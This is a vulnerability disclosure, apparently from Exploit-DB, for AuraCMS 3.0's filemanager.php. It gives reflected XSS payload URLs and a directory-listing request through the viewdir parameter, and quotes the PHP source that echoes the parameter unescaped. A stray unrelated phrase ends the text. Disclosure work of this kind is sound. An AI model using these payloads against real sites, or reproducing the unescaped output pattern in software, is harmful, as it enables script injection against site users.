# Exploit Title: AuraCMS 3.0 Multiple Vulnerabilities # Date: 05/28/2014 # Author: Mustafa ALTINKAYNAK # Download URL :http://auracms.org/ # Software Link: http://codeload.github.com/auracms/AuraCMS/zip/master # Vuln Category: CWE-79 (XSS) - CWE-98 (LFI) # Tested on: AuraCMS 3.0 # Tested Local Platform : XAMP on Windows 8 # Patch/ Fix: Not published. --------------------------- Technical Details --------------------------- 1) Reflected XSS : FileManager is a parameter unfiltered view of the file. Ex: filemanager.php?viewdir="><script>alert('Mustafa');</script> 2) LFI (Local File Include) : Directory listing is done. Ex : filemanager.php?viewdir=/home --------------------------------------------------------------------------------- # filemanager.php (Between 263,311 line) Example : domain.com/auracms/filemanager.php?viewdir=request 280 line : <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" /> Example 2 : domain.com/auracms/filemanager.php?viewdir="><script>alert("mustafa");</script> <input type="hidden" value="<script>alert("mustafa");</script>" name="return" /> Example 3 : domain.com/auracms/filemanager.php?viewdir=<script>alert("mustafa");</script> <input type="hidden" value=" "><script>alert("mustafa");</script>" name="return" /> Bingooo :) <?php if(isset($_GET['viewdir'])) { ?> <ul id="browser-toolbar"> <li class="file-new"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['new_file_title']; ?>" onclick="toggle_visibility('load-file'); return false;"><?php echo $lng['new_file']; ?></a></li> <li class="folder-new"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['new_folder_title']; ?>" onclick="create_folder('<?php echo $_GET['viewdir']; ?>'); return false;"><?php echo $lng['new_folder']; ?></a></li> <li class="folder-delete"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['delete_folder_title']; ?>" onclick="delete_folder('<?php echo $_GET['viewdir']; ?>');"><?php echo $lng['delete_folder']; ?></a></li> <li class="file-refresh"><a href="https://www.exploit-db.com/exploits/33555/#" title="<?php echo $lng['refresh_files_title']; ?>" onclick="load('filemanager.php?viewdir=<?php echo $_GET['viewdir']; ?>','view-files'); return false;"><?php echo $lng['refresh']; ?></a></li> </ul> <div id="current-loction"> <?php echo htmlspecialchars($root_path . '/' . $_GET['viewdir'] . '/'); ?> </div> <form style="display: none;" id="load-file" action="" class="load-file" method="post" enctype="multipart/form-data"> <fieldset> <legend><?php echo $lng['new_file_title']; ?></legend> <input type="hidden" value="<?php echo $_GET['viewdir']; ?>" name="return" /> <label><?php echo $lng['form_file']; ?><input type="file" name="new_file" /></label> </fieldset> <fieldset> <legend><?php echo $lng['new_file_manipulations']; ?></legend> <table> <tr> <td><label for="new_resize"><?php echo $lng['form_width']; ?></label></td> <td><input type="text" class="number" maxlength="4" id="new_resize" name="new_resize" value="" /> px</td> </tr> <tr> <td><label for="new_rotate"><?php echo $lng['form_rotate']; ?></label></td> <td> <select id="new_rotate" name="new_rotate"> <option value="0"></option> <option value="90">90</option> <option value="180">180</option> <option value="270">270</option> </select> </td> </tr> <tr> <td></td> <td><input type="checkbox" class="checkbox" id="new_greyscale" name="new_greyscale" /><label for="new_greyscale"><?php echo $lng['form_greyscale']; ?></label></td> </tr> </table> </fieldset> <input type="submit" id="insert" value="<?php echo $lng['form_submit']; ?>" /> </form> <?php } ?> ----------- Mustafa ALTINKAYNAK twitter : @m_altinkaynak <http://twitter.com/m_altinkaynak> www.mustafaaltinkaynak.com
体验盒子